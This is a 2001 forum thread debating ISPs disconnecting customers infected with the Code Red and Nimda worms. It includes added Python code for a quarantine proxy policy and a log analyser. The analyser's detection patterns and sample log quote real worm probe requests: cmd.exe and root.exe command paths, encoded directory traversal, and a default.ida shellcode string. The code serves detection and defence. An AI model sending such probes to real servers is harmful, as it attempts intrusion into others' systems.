Shutting Down Worm-Infected Broadband Users
disc-chord writes "Frustrated by Code Red and now Nimda, the DSL provider DSL.net (a CLEC and reseller of Covad) has shut off 800+ infected customers. They claim they cannot get in touch with all of their customers, so they're just shutting them all down, and waiting for the customer to call them. When/if the customer does call they are informed that they are infected with the Nimda virus and must remove it before they will be reactivated. But how are customers supposed to fix the problem when their internet connection is shut down? " I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. The Internet is a peer-to-peer system where one peer can piss in the public pool. These ISPs are doing a good thing by keeping this crap off the net. Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users. At least this way they know what's up. Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes. ISPs shouldn't have to be responsible for their users this way, but they are responsible for keeping their other users online, and a few infected boxes can cause a lot of havoc for the whole net.
I received a nastygram yesterday saying a machine on my network was infected. Being a responsible netizen I took it offline right away, of course.
But the email begged the question in my mind: Would @home continue billing me if they cut me off? Damn right they would've...
Who did what now?
Why is it an ISPs job to have any concern over what's passing across the wires? They are just packets and that should be that. If users wish to run systems which are configured to respond in a particular way to particular requests on port 80, that's the users' business.
I don't see this as caring or responsible behaviour by the ISP - I see it as unwelcome nannying. As the poster said, users should be responsible for their own systems.
-- Ed Avis ed@membled.com
Free Mac Mini
Personally, I agree. I would rather have an ISP shut down infected users (who, I think, should at least check to see if they are infected, esp. with all the media coverage) rather than block ports so that I can't do stuff. Shut them off, let them call, inform them, if they haven't fixed it in 24 hours, shut them down again. If I was on the receiving end, I would just think that this ISP was being a responsible netizen.
SealBeater
-- Its survival of the fittest...and we got the fucking guns!!!
Microsoft will never fix the problem without making sure people have to pay a monthly subscription
I could have sworn both the Code Red and Nimda (multiple) exploits were patched in October *last year*.
Yes, it's the fault of the users not keeping their machines up-to-date, but please, don't blame this on MS when they released, and advertised, a patch promptly. Heck, it'd be like some idiot running an old version of Sendmail blaming the sendmail author(s) for his box getting hacked. If you're on the net, it's your responsibility to stay safe.
http://twitter.com/onion2k
Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users.
Confuse users? Bah! They get confused well enough on their own!
My major issue with blocking ports is that, well, no ISP should! An ISP provides internet connectivity, and that's what they should do.
Yes, I agree they should have some say so over what traffic comes and goes over their network (i.e. no spam, DoS attacks, etc), but I myself would not give any ISP my business if I knew they were making choices about which ports I can or can not use.
I think they are doing the right thing by booting infected users. It's certainly better than any form of port blocking.
"Everything you know is wrong. (And stupid.)"
Moderation Totals: Wrong=2, Stupid=3, Total=5.
Absolutely; I agree that these users should be kept off the public network until they learn to take care of their systems. I am on a campus network, so there are literally hundreds of systems here attacking mine right now. In fact, in the last three days I've had close to 12,000 of the worm attacks, but about eight hours ago they stopped abruptly. I made a phone call, and it turns out that the university did the exact same thing. Every user that was infected and actively broadcasting attempts to infect others for two days was disconnected from the network. At first it seemed drastic to me, but we're using a public resource, and their traffic was polluting our already-clogged network.
A small, good firewall would be nice. There's definitely a market for small - palm sized maybe - firewalls.
Look a monkey!
My firewall logs quadrupled in size when Nimda hit, and there are still loads of people in the 194.217.0.0 range infected. My router's set up to block many of these, to save the load on the firewall, which happens to be the webserver too.
I've been contacting Demon Internet (UK ISP), trying to get them to shut down the people responsible. So far, no joy.
Tom.
Oh arse
"I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. "
I think the huge underlying problem is that a) people do *not* know their box is infected and b) if they do know, they have no idea what to do about it. Don't forget, most people are very timid and lack any basic knowledge regarding computers. All they know how to do is double click on the word2k icon, or outlook, or whatnot.
S.t.e.v.e.
(this solution may or may not work, I haven't really thought it through) Maybe ISPs should setup a private net. Then when people get infected, they switch them to the private network, and all the customer can get is a site where they can download a patch for their machine.
Of course this would be an expense for ISPs, but it sure would be nice to have these people off the Internet until they get their stuff patched (yes, I realize that's what's happening now, but this would be a nicer way to do it). Anyway, just a thought.
-ictatha
"... the advance of civilization is nothing but an exercise in the limiting of privacy" - Janov Pelorat
Turning off people's connection is rude. Asking a 75 year old senior citizen, who is just happy to read a few web pages and send mail to his grandkids to keep up an endless stream of patches because a bunch of hackers can disrupt the net is backwards.
Your anger should be directed at the folks who
1) Created the software
2) Created the hack
Or better yet...instead of whining about it you could actually HELP the folks who are infected, I know I am helping several of my wife's friends who just want a PC to help their kids through school.
So hop off your technological high horse and do something to solve the problem.
I'm still working on a clever footer.
Surely if a user is infected, the ISP could cut them off from the world but still allow them access to an internal ftp site with had patches to fix the problem?
He should perhaps consider educating these people about their problems rather than blaming it on the software. The problem is, OSS zealots consider Free software to be superior because of its mechanisms for peer review when in fact it is only "superior" because its use isn't prevalent enough to spark the kinds of worms and viri we are seeing which predate upon the stupidity of the user.
One of the big problems with IIS is that it's very easy to install. In fact many people don't even realize that it is installed - until they get h^Hcracked... and even then not always. M$ often claims that Windows provides easy administration.... that's not always a good idea. Until installing IIS is a non-standard optional extra these internet worms are going to be a problem. ISPs which are "ruthless" (like this has been) will, I'm sure, make a lot of people more aware of potential security problems. Perhaps they should take it one step further and install cracking software of their own... when an insecure site is found, simply shut it down. If every ISP did this then many worms would not be able to spread quite as quickly. This all assumes that the ISP sysadmins know what they're up to!! Do they?
return 0; }
I agree completely. I've had over 16 000 attacks on my box and it's obviously taking a lot of bandwidth. My ISP (University really) is shutting down lots of computers as a result of the Nimda worm.
If people are so stupid they run IIS (it's forgivable to forget to patch it once a day) they deserve punishment.
I hope this makes people switch from both IIS and Microsoft Windows NT/2000/XP as a server platform.
Ciryon
Mail 'em a CD?
Sounds to me a bit like the concept of a debtors' prison. (People were sent to jail 'cos they couldn't pay their debts. How could they pay 'em off when they were in jail?)
Anyone quoted by a reporter knows how little they understand
Don't believe what you read is the truth.
Yeah, that NIMBUL's a pain in the ass, all right. Your party has to be pretty tough to take him on. It's those damn boots of dodging, they make it impossible for missile weapon-using characters to get a shot in, and he just slams you with spells. I recommend adventuring around a bit before you venture to the Nashkel mines, that way... what?... Nimda!? Oh fuck, never mind...
Would it be better to shut down access to all but a few sites.....
i.e. Any random http site gets redirected to a big message saying 'you have been blocked as you are infected by.....', and then provide links to the M$ or other download pages.
All other outgoing (i.e. smtp, ftp, etc) should also be blocked, but mail collection via POP should be allowed.
Our IT department has completely overreacted, but what's new....
Simon W.
Microsoft patched this problem a LONG TIME AGO; if you get either of these viruses it's YOUR fault. I'm glad to see ISPs putting the blame where it belongs, on the users.
It's nice to sit in your ivory tower and pretend there's some solve-all solution but the simple fact is, if these people used any other OS they'd be just as open to whatever attacks they were too lazy to patch.
It's NOT an OS problem, it's a USER problem.
"The Internet is a peer-to-peer system..."
er? i think tcp/ip and the ip routing protocols would disagree.
especially since many hi-speed companies ACTIVELY DISCOURAGE YOU from setting up your own firewall to begin with. When I got my roadrunner cable modem, I had to go to a class where the lady who was running it actually said that a firewall "wasn't necessary" and tried real hard to convince us not to set one up... but that, I think, had more to do with the fact that a firewall allows you to connect as many machines as you want on the same IP address...
While the notion that "it's your responsibility to get yourself cleaned up" sounds good, it's an irresponsible one for an ISP to take when they've actively encouraged the stupidity in the first place.
+------------------------------------------------
+ The urge to destroy is a creative urge
What about all those - few - that aren't subject to infection? E.g. Linux users.
I think Gartner hit the (blindingly obvious) nail on the head when they released a recommendation a couple of days ago that we should all start moving away from using MS IIS and associated junk and use something more reliable and less buggy instead !
Re: http://www4.gartner.com/ - "Nimda Worm Shows You Can't Always Patch Fast Enough"
I was just asking someone why ISPs don't do this. Why should the subnet I'm on get punished because of users who don't know what they're doing? Obviously they're going to call tech support and then get a quick lesson on how to download and install an MS patch.
I'd rather have the infected parties make some effort instead of the AT&T approach of just closing port 80 and letting the ignorant go unenlightened.
New slogan? Patches are the new killer app!
Let it be known that I had a funny post, and being a karma wh0re I would have gotten my 'earnings' (karmically speaking) for the day. unfortunately the Slashdot ASCII art filter moderated me, no matter how simple I made the message....
So, since I need karma, here's my lame attempt at a 'funny' mod:
fuck you ascii art filter
Jeez, what about just sending them an email? Their ISP would know their email address wouldn't it? How about emailing them an attachment with the patch and telling them step-by-step what to do? Seems obvious to me......
PK: 09F911029D74E35BD84156C5635688C0
"The effects of this worm are detrimental to all and we'd like to give each member a chance to secure their machines. However, after 9/23/01, Speakeasy's Abuse Team will be freezing the DSL circuit hooked to any machine infected with the worm. We apologize for the inconvenience of this, but it is imperative that we ensure our network is not assisting in the propagation of this, or any, worm. All of us are part of a larger community, and it really isn't cool to infect your neighbors."
I'm glad they are doing this. It is about time
"Weapons should be hardy rather than decorative" - Miyamoto Musashi
I think that goes for OS's too
That is, uhm, stupid. Why would you shut down port 80 for infected machines? To prevent them from being infected twice? Shutting down port 80 for vulnerable machines is more sensible, but how do you tell them from the well-patched servers? Blocking ports isn't meant to be a punishment, it's supposed to be a preventive measure.
"Microsoft will never fix the problem without making sure people have to pay a monthly subscription"
Taco, I really, really think you know that Microsoft posted a patch months before this hole was exploited.
:wq!
I keep seeing "Firewall!" being the answer from the security-uninformed. As though this mythical brick wall were a magic shield.
Nimda gets inside your firewall the moment one user clicks on an infected web site or reads that readme.exe e-mail. Then all your beautifully crafted filtering is useless junk.
Here at Georgia Tech our central network people started disabling infected host ports on the second day. It is a "shoot first, ask questions later" situation when something this virulent is flooding the network backbone and impacting the rest of campus. One machine can sit there at full CPU on a 100-Mbit connection and spew quite a lot of attack attempts. We don't let Typhoid Mary wander the city trying to "understand her situation"; we quarantine her pronto. Situations like this are a clear and present danger not even primarily from an infection standpoint, but in what they do to the network. If we have a host with a bad ethernet card that is flooding the network, what do we do? Turn off the port if the owner cannot be found or is not responsive. This is not as complex as people are trying to make it.
It would be ideal if there were plenty of time to contact each and every user, but there isn't. They often are not there, are you just going to let that cable modem unit bring your neighborhood to a crawl while the owner is on vacation? I hope not.
I would just like to point out:
a) I told Microsoft that Outlook would get hacked back in 1998 when they had the nerve to release that piece of crap Outlook 98 with the HTML viewer. They said "it won't happen" and "our customers wanted it."
b) I use DSL.net (but not for much longer) and it took me about 20 phone calls before I actually reached someone who could tell me what the hell was going on.
c) My network (unlike the rest of the state networks in Connecticut) did not get infected. Not because I was lucky, but rather because I had already taken the necessary precautions to prevent the worm.
I kinda agree in this case, but the decision to banish subscribers really is opening Pandora's box.
Sure, turning off offending boxen is good in this instance (though I like some of the other suggestions like creating a private VLAN with the worm-fixes, etc), but what precedents are the ISPs setting for themselves?
Aren't they opening themselves up to be the net-police? If they take this responsibility upon themselves now, how do they relieve themselves of it later? I don't think the courts will approve of a fickle, seemingly arbitrary (from a layman's point of view) use of enforcement power.
Now if this type of offense (worm, SPAM, etc) is covered in the EULA, then I think the ISP is perfectly justified in shutting people off. If there's no way to get ahold of them (no email on file, etc), then the only real way to get their attention is to dam the bit flow.
my $0.02
I'm in favour of ISPs locking out infected machines that have demonstrated no attempt at fixing the problem. After all, these people have shown a blatant disregard of basic sysadmin responsibilities: how long has CodeRed been known about now?
However, here's a suggestion for a better response than simply removing Internet access to/from infected machines. The ISP runs some kind of DMZ server, but on the DSL side. All web traffic from infected machines is redirected to that one server (via transparent proxying), all other traffic is blocked. That way the end user can instantly see what's wrong. The ISP can also mirror the relevant patches on the DMZ so the end-user can get back up again as fast as possible.
It would take some setting up initially, but would reap substantial rewards in the long run.
| What, you were expecting
-O_O- +---- something witty?
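The walled-garden design in the post above (transparently redirect an infected customer's web traffic to a notice page that also mirrors the patches, block everything else), as an added example that is not the poster's code or any ISP's implementation: a small policy engine a transparent proxy or gateway could consult per connection. The hostnames quarantine.isp.example and pop.isp.example, the patch-mirror allowlist, and the allowance for POP mail collection (suggested earlier in the thread) are assumptions made for the example; the quarantined addresses are constructed.

```python
import ipaddress
from typing import NamedTuple, Optional
from urllib.parse import quote

# Assumed names for the example; not real ISP infrastructure.
NOTICE_URL = "http://quarantine.isp.example/infected"
PATCH_MIRRORS = {"quarantine.isp.example", "windowsupdate.microsoft.com"}
POP_SERVER = "pop.isp.example"


class Verdict(NamedTuple):
    action: str            # "allow", "redirect" or "block"
    detail: Optional[str]  # redirect target, or the reason for the decision


class Quarantine:
    """Customer addresses currently confined to the walled garden."""

    def __init__(self, addrs=()):
        self._held = {ipaddress.ip_address(a) for a in addrs}

    def add(self, addr):
        self._held.add(ipaddress.ip_address(addr))

    def release(self, addr):
        """Called once the customer has phoned in and the box is patched."""
        self._held.discard(ipaddress.ip_address(addr))

    def holds(self, addr):
        return ipaddress.ip_address(addr) in self._held

    def decide(self, src, dst_host, dst_port):
        """Policy for one outbound connection from `src` to `dst_host`:`dst_port`."""
        if not self.holds(src):
            return Verdict("allow", None)
        if dst_port == 53:
            return Verdict("allow", "dns is needed to resolve the notice page")
        if dst_port == 80 and dst_host in PATCH_MIRRORS:
            return Verdict("allow", "patch mirror")
        if dst_port == 80:
            # The proxy answers with a redirect. Because the worm spreads over
            # outbound port 80, this also swallows the infected box's own probes.
            target = f"{NOTICE_URL}?blocked={quote('http://' + dst_host, safe='')}"
            return Verdict("redirect", target)
        if dst_port == 110 and dst_host == POP_SERVER:
            return Verdict("allow", "mail collection via POP")
        # SMTP, FTP and everything else stays shut until release().
        return Verdict("block", f"port {dst_port} not permitted while quarantined")


def redirect_response(location):
    """Raw HTTP/1.0 response the proxy returns in place of the requested page."""
    body = ("Your connection has been quarantined because your machine is "
            f"spreading a worm. See {location}\r\n")
    return (f"HTTP/1.0 302 Found\r\nLocation: {location}\r\n"
            "Content-Type: text/plain\r\nConnection: close\r\n\r\n" + body).encode("ascii")


# Constructed state: two customers observed spewing worm probes.
HELD = Quarantine(["192.0.2.17", "192.0.2.23"])

if __name__ == "__main__":
    for dst, port in (("www.example.com", 80), ("pop.isp.example", 110), ("mail.example.com", 25)):
        print(dst, port, HELD.decide("192.0.2.17", dst, port))
```

The redirect carries the originally requested host as a query parameter so the notice page can tell the customer what was intercepted; the DNS and patch-mirror exceptions are the minimum the customer needs to actually reach the fix, which is the gap the original "just cut them off" approach leaves open.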
Just got a phonecall from Siemens SBS in Brussels. :)
Everybody stopped working an hour ago. All PC's have been infected and no more work can be done now!
If this continues we are looking at a lot of people going on a paid holiday
42 + 1 = 42
And since port 80 is the one normally used by an http daemon, and you're (usually) not supposed to be operating a web server over residential broadband, it was a perfectly reasonable measure.
GreyPoopon
--
Why is it I can write insightful comments but can't come up with a clever signature?
Despite popular opinion and marketing, the internet is not for everybody. Use at your own risk. If you don't understand all the risks involved you shouldn't be using it.
For those that continue to tread in dangerous waters, and don't have a clue that their NT desktop at home installed and started a webserver.. too bad, Natural Selection baby;)
I disagree with the "What should an ISP care". They care a lot. Bandwidth and network performance is important (unless you're a monopoly and don't care). They deal with their respective users as they see fit. If the customer doesn't like it, go elsewhere.
Though I am disappointed, my codered/nim. page was getting good;)
http://doomicon.darkmilieu.org/cr.html
Awesome!
Look, I'm not for censorship or any other limitations imposed on my freedom... but it is ultimately the broadband company's decision on what they will do with their lines. Saying "they shouldn't worry about this, they just move packets" as posted somewhere above is completely missing the point. If I ran a broadband company I would certainly shutdown what I considered a threat to the greater good of my customers. Whether that is a worm/virus/trojan box or someone running a high traffic porn/X10 site doesn't matter. The fact remains that those companies own the connection and can do as they please with it. So what if they block port 80? Is it really crucial for someone paying a company $40 a month for a decent connection to bitch about? Is that going to cost that someone serious money? I doubt it... and if it is, maybe they should invest in a line that doesn't restrict their access such as a larger backbone. If you don't like the rules of the game, then don't play it.
can't sleep slashdot will eat me
Received an email yesterday that speakeasy.net will be shutting down all customers who are infected until they clean their system. I suspect that would require a phone call. This is a good thing that all ISPs should be doing. They should do it quickly and maybe then we'll begin to see some cleaning up in areas where software makers can't seem to fix quickly enough. I for one am tired of these "Zombie" computers infecting others. Two thumbs up to all ISPs that do this.
Just thought about problem, infected users have first to -download- the patch, so they get internet connectivity again, so they can download the patch, they need before. :o)
It's like the CD-ROM drivers shipped on CD.
--
Karma 50, and all I got was this lousy T-Shirt.
Those affected should welcome this kind of action. After all, the internet provider is closing a backdoor for the customer. That backdoor (FULL system access!) would otherwise keep announcing itself to the world.
The Internet is a peer-to-peer system where one peer can piss in the public pool.
Don't you mean to say pee-er to pee-er?
Yes, most @homes specifically say you can't run servers in their AUPs, although DSL ISPs (and some @homes) typically let you run servers to your heart's content. However, one real advantage that blocking port 80 WOULD have is denying the ability to access the backdoors created by nimda / code red on those machines.
I may be dumb, but I have W2K Professional and NT4 Workstation running on several machines and at install I never saw such a checkbox. That's perhaps because there is no IIS with those versions? (AFAIK there isn't) Or perhaps I have IIS and I'm not aware of it, though that would astonish me since I didn't see it in the "Services".
What the heck are all those people doing with W2K Server or NT4 Server on their workstations? It doesn't make any sense, does it? It's not because the word "server" is in the name of the product that it's better suited to do your normal surfing.
Ahhh...the great dumpster continuum. Many a free computer will be found there. -- sowth (748135)
this worm is particularly nasty. it's really made my work week, that much is for sure.
...to NTBugTraq? Do they even service pack their server or workstation? The answer is: no not everyone. The information required to be a good MS product admin is there, you just need to get it. If you're a legit microsoft product owner it ought to be required that you get a digest format of their advisories in e-mail weekly. (An even better question is: how many of these IIS servers are properly licensed ???)
...Both, in my estimation. While I agree that it is the responsibility of the user to keep themselves patched, ISPs monitor network traffic, they can easily pay attention when a known high risk virus or worm is flooding their network.
in response to the growing storm regarding users vs ISPs... (/me dons his asbestos shorts)
yes users are responsible for their systems, they are responsible for watching patch levels, they are responsible for watching out for vulnerabilities. So many people throw up an IIS server or what-have-you on their DSL/Cable line it's not funny. Do you think all of them are subscribed to microsoft's Security advisory list?
And for those of you that thought I was beating on the users hard up there...Yes it is the responsibility (nay, the duty) of the ISPs to protect their networks, and by mission of action the internet. I run apache as my webserver of choice, my logs flooded with attempts to find CMD.EXE and ROOT.EXE in all the right MS places tuesday night and into wednesday morning. A veritable denial of service attack. Here's the kicker: I'm on a dynamic IP! (nice about the randomization of searching in this worm...) Many requests were coming from my own ISPs network. Do you think they responded when I e-mailed them? no, they didn't.
A good ISP shuts off a user who (knowingly or unknowingly) abuses their connection. What if this worm were more malicious? What if it caused data loss? Think of the liability that could impose, so'n'so's unpatched web server infected my unpatched webserver and blew away my e-commerce site. Who takes the blame? so'n'so? or so'n'so's ISP?
Don't even get me started on why worm/virus writers should be sending their exploits to anti-virus companies or other proper organizations instead of releasing them into the wild.
I like the comment that Microsoft doesn't fix these issues without the user paying a subscription, or whatever crap MoronTaco is spewing forth today. For his information, every single exploit Nimda uses has been patched. Some have been patched as long as a year ago. These patches are, and have always been, downloadable for free. Windows Update and Windows Update Critical Updates Service will inform users of these patches when they come out. FUD spewing morons.
My ISP (DSL.ca) is doing the same, plus blackholing any remote IPs sending Nimda requests. They blackhole on seeing the first Nimda packet, and unblackhole 6 hours later to give them a chance to clean up in that time.
http://www.dsl.ca/status/
Bitchslapped. Neat.
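Two posts above describe, from opposite ends, what an ISP or an annoyed admin actually works from: one poster's Apache logs flooded with requests for CMD.EXE and ROOT.EXE "in all the right MS places", and DSL.ca's policy of null-routing a source on its first Nimda packet and releasing it six hours later. As an added example that is not part of the original thread or any poster's code, here is the detection and blackhole logic in Python: it parses Apache-style access-log lines, classifies Code Red and Nimda probes by their well-known request paths (default.ida for Code Red; root.exe/cmd.exe and the encoded "..\" traversals for Nimda), aggregates per source into an abuse report of the kind another poster mailed to @home, and drives a blackhole table with a 6-hour expiry. The log lines are constructed, and the signature list covers the common request shapes rather than every variant.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format up to the status code; referer and agent are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Request shapes the two worms send. Code Red hits the Index Server ISAPI filter
# via default.ida; Nimda asks for root.exe/cmd.exe, often reached through URL- or
# overlong-UTF-8-encoded "..\" traversal out of /scripts, /msadc, /_vti_bin etc.
SIGNATURES = (
    ("CodeRed", re.compile(r"^/default\.ida\?", re.I)),
    ("Nimda", re.compile(r"/(root|cmd)\.exe\?/c\+", re.I)),
    ("Nimda", re.compile(
        r"/\.\.(%5c|%255c|%%35%63|%%35c|%25%35%63|%252f|%c0%af|%c0%2f|%c1%1c|%c1%9c)", re.I)),
)


def classify(path):
    """Return the worm whose probe this request path matches, else None."""
    for worm, pattern in SIGNATURES:
        if pattern.search(path):
            return worm
    return None


def parse_line(line):
    """Parse one access-log line into (ip, timestamp, worm-or-None); None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, classify(m["path"])


class Blackhole:
    """Null-route a source on its first worm probe; the route lapses after `ttl` so
    the owner gets a window to clean up, and is re-placed if probes resume."""

    def __init__(self, ttl=timedelta(hours=6)):
        self.ttl = ttl
        self.until = {}    # ip -> time the current blackhole lapses
        self.events = []   # (ip, start, end) for every blackhole placed

    def is_blocked(self, ip, now):
        return ip in self.until and now < self.until[ip]

    def observe(self, ip, now):
        """Record a worm probe from `ip`; return True if a new blackhole was placed."""
        if self.is_blocked(ip, now):
            return False   # already null-routed; the probe is dropped, nothing to extend
        self.until[ip] = now + self.ttl
        self.events.append((ip, now, self.until[ip]))
        return True


def analyze(lines, ttl=timedelta(hours=6)):
    """Walk log lines in order; count probes per (ip, worm) and drive the blackhole table."""
    counts, first_seen, last_seen = defaultdict(int), {}, {}
    bh, skipped = Blackhole(ttl), 0
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            skipped += 1
            continue
        ip, ts, worm = rec
        if worm is None:
            continue
        counts[(ip, worm)] += 1
        first_seen.setdefault(ip, ts)
        last_seen[ip] = ts
        bh.observe(ip, ts)
    return {"counts": dict(counts), "blackholes": bh.events,
            "first_seen": first_seen, "last_seen": last_seen, "skipped": skipped}


def abuse_report(result):
    """One line per offending source, ready to paste into a mail to its ISP's abuse desk."""
    per_ip = defaultdict(list)
    for (ip, worm), n in sorted(result["counts"].items()):
        per_ip[ip].append(f"{worm} x{n}")
    return [f"{ip}: {', '.join(w)} (first {result['first_seen'][ip]:%Y-%m-%d %H:%M}, "
            f"last {result['last_seen'][ip]:%Y-%m-%d %H:%M})" for ip, w in per_ip.items()]


# Constructed sample log, not real traffic: two Nimda probes, a Code Red probe, a
# legitimate fetch, a malformed line, and a late Nimda probe after the first blackhole lapsed.
SAMPLE_LOG = [
    '194.217.1.10 - - [18/Sep/2001:13:00:00 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276',
    '194.217.1.10 - - [18/Sep/2001:13:00:01 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276',
    '24.10.0.5 - - [18/Sep/2001:13:05:00 -0400] "GET /default.ida?NNNNNNNNNNNNNNNN%u9090%u6858%ucbd3 HTTP/1.0" 400 325',
    '10.0.0.7 - - [18/Sep/2001:13:06:00 -0400] "GET /index.html HTTP/1.1" 200 1043',
    'this line is not an access-log record',
    '194.217.1.10 - - [18/Sep/2001:19:30:00 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276',
]

if __name__ == "__main__":
    for line in abuse_report(analyze(SAMPLE_LOG)):
        print(line)
```

Run against a real access log one line at a time, the same source seen probing after its six-hour window has lapsed gets a fresh entry in the blackhole table, which is exactly the DSL.ca behaviour described above; the Code Red pattern is deliberately anchored to default.ida only, since a loose match on long query strings would also catch legitimate traffic.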
What?? If I can read, then Nimda uses something like 12 or more different exploits in MS products. Not just IIS! It affects the IE web browser (the client ya know), is sent via email from people who got it already, and additional IIS exploits as well. So I do not believe there is an old MS patch for all of Nimda.
I am affected by AT&T blocking port 80 as well. I think that port blocking is crazy and drives me nuts. I set my entire web site up to listen on port 81 and link everywhere on port 81. What a damn joke! Screw big dumbass corps that do whatever they want! They make me feel like I am being telefragged in that I can't do anything about it!!!
Please... post responsibly
ZERO ZERO ONE ZERO ONE ZERO ONE ONE! Just brushing up for my next big invention: Ethernet over Voice (EoV)
I've had almost 25,000 incoming port 80 requests since this virus was unleashed. (That's with my Linux box running constantly.) It's nice to see an ISP doing something productive.
To the naysayers, I'd like to point out that they aren't punishing people; just making them call to get their access back and make sure they're not infected. Remember, the bandwidth belongs to the ISP. They have to protect it.
I wish BellSouth would do something similar, but they've always been clueless. Heck, many of these requests were from BellSouth servers!
You should call somebody that knows what they are doing. I love the fact that everybody blames the software even though it's usually the user who can't be bothered to patch their systems. If you have no computer skills FULLY EXPECT TO PAY SOMEBODY WHO DOES!! This should hopefully motivate you to learn if you are whining about the money that it costs to get your machine back up. If you are a manager type well then shame on you for not getting some skilled IT help or PURCHASE A SERVICE AGREEMENT FOR YOUR SOFTWARE! You can't have the whole world your way; either get some skills or get some money. The choice is yours. I fully support those ISPs that are doing this; I wish mine did because my broadband is next to useless now!
Got hosting
but firewalls usually come with IP Masquerading tools.
I'm glad other people have had more luck with their ISP's. I honestly couldn't understand WHY the lady running the class would DISCOURAGE firewall use -- the only thing I could think of was that they were actually trying to discourage IP Masquerading so people wouldn't be connecting more than their two-machine limit to the cable modem service.
Call me a turncoat, but after getting frustrated to high hell, I weeded through my router logs and sent @home a list of offenders and told them to please do something. Seeing as how my ping ranges from 2000ms to timeout to the @home news server, I'd say that they haven't gotten them all yet.
How the crap am I supposed to truly test the multiplayer wolfenstein with such erratic connectivity?!
Can you say "go to Best Buy and buy Norton or McAfee"?
7 November 2006: The day Americans realized corruption and incompetence weren't addressing 11 September 2001
not all users are competent to deal with problems like this. the more the virus spread, the more stoopid users vill get infected..
it is causing some concerns that the ISP detects what traffic the user sends through the line, but as far as I'm concerned, this is a single 'nannying case' where there would be much more shit happening if the ISP were sitting back doing nothing..
I use Road Runner too. Though I understand it's run differently in different locations.
Although, when all is said and done, if this Nimda thing can be spread through email, a firewall wouldn't really do much good anyway.
Road Runner in Central Florida has done the same thing. Don't know if it includes the rest of the country.
:-)
At first I didn't know if they'd blocked just me, to stop the constant flood of email from my auto-notifier
Nothing what commie Torvalds and his three letter (RMS and ESR) henchmen say can change that!
You forgot IBM... ;-P
$HOME is where the
-- silver_p
It's happening already. Our civil liberties are under attack...we are being denied our right to a broadband connection.
If we take these precautionary steps, then the worm has won.
Evil is the money of root.
Shut down all the WinBlows users! No skin off my back. Or don't and let them get infected, wither, and die. I have no pity for the technically crippled.
http://undeadlinux.com
After months of frustration at trying to get ION, I finally broke down and signed up for @home. My fw logs are a tedious stream of nimda and code red horse poopie. Meanwhile my overall bandwidth performance degrades by the hour. Like many of you I use my connection at home for some telecommuting duties, which has been impossible for the last week, and for a full two weeks during codered. It continues to amaze me that the average user is not only lazy, and stupid, but is completely unwilling to take responsibility for the repercussions of their actions! Let's say I go and have sex with 18 prostitutes in thailand wearing the _same_ condom. Then I find I'm HIV positive. Who has sympathy for me??? PLEASE cut my dick off! Perhaps someday the courts will create a 'computer school' like traffic school and force repeat offenders to pass some courses before they're allowed in front of a keyboard. There could be movies like "Red Flashing Lights" and "Blood on the Admin" that show what stupid IIS worm propagation does to the heart of IT folks everywhere who, although not running IIS themselves, find their upstreams throttled by a pile of uneducated maroons!
Help, I'm being repressed!
You have the phone number of your ISP. You call them and they tell you the MD5 or at least the length and CRC of the antiviral program. And this procedure should be described in the letter.
They who will not follow the recommendations have chosen their fate themselves. Amen.
I have been reading a lot about these viruses in mainstream and off-line media, and not one has yet said this has to do with a very specific Windows weakness.
Not one mentions the fact that Apples can't get this. I don't know who Microsoft's spin-meisters are, but they should be patted on the back for this one. They have managed to avoid taking any blame for faulty software.
As was pointed out in an earlier post, Apples are immune to this sort of thing. Say what you will about them, this is just another reason why it is a superior OS.
Don't get me wrong, I don't have a Mac anymore, as they don't run the games I want to play, nor does the ERP I consult on have a Mac front-end, but for the "75 year old" who just wants email-they are great.
david
Sig. Ah...yeah, right. Wait a sec. I'll come up with one yet...
AT&T Broadband's modem leasing agreement clearly states that you can run a http or ftp server.
Yes it sucks, yes it's unfair and yes you'll probably have to pay five times your normal price to have it enabled, but it'll deter those people who have no need to run a web server (ie. those who don't realise they're even running a web server) and will make the DSL provider's life a little easier.
You'll see.
I've been running Apache on my Linux box for about five years, and I've never patched my system! How can I tell if I'm infected? I imagine that I am, due to the many lines in my logs where people are trying to access my /scripts/ directory and default.ida, and I can't seem to find these things anywhere on my computer.
Please advise.
But they are running IIS, which isn't a free web server; they should have paid plenty of $ to run it.
Actually, IIS is entirely free. Or at least it comes built into Windows 2000 and 98, and is downloadable for free for NT and 95.
Our campus was affected rather badly by Nimda, and as a result the students were cut off from the network to make sure that they weren't infecting or being infected by the worm. The outage only lasted as long as it took McAfee to distribute the cleaning agent for it.
If you have cancer, you cut it out, right?
It's not unwelcome nannying, it's a necessary precaution. You do what you have to do to ensure that you maintain your level of service.
Burn their crops and salt their earth.. Damn lusers who don't keep their systems up to date should be dragged out in the road and shot.
-- Posted using RedHat 5.2 with a full install, no firewall.
I think you are missing the long range plans of Microsoft. Antivirus companies are the same way: you buy a product and then get hooked into a subscription fee to keep getting new updates to the software (virus) libraries.
Microsoft's intention is to move away from a sale to a rent business model. In the event that you don't pay the rent, you either have zero access to anything or at least zero upgrades/updates to the software you currently have.
Most people would consider it a basic responsibility of the manufacturer to inform its customer base of a known problem and to provide a remedy for little or no cost. In the automotive industry, this is a recall. They don't like it, they don't profit from it, but sometimes they have to do it.
Software has excused itself from the product liabilities of other industries because of its EULAs, and people have come to accept them. Would you purchase a car (life-threatening potential) or even a TV (non-life-threatening potential) if there was an agreement you had to sign stating that the manufacturer is not making any guarantee of product performance (car: brakes / TV: reception or cable compatibility)? I would hope not.
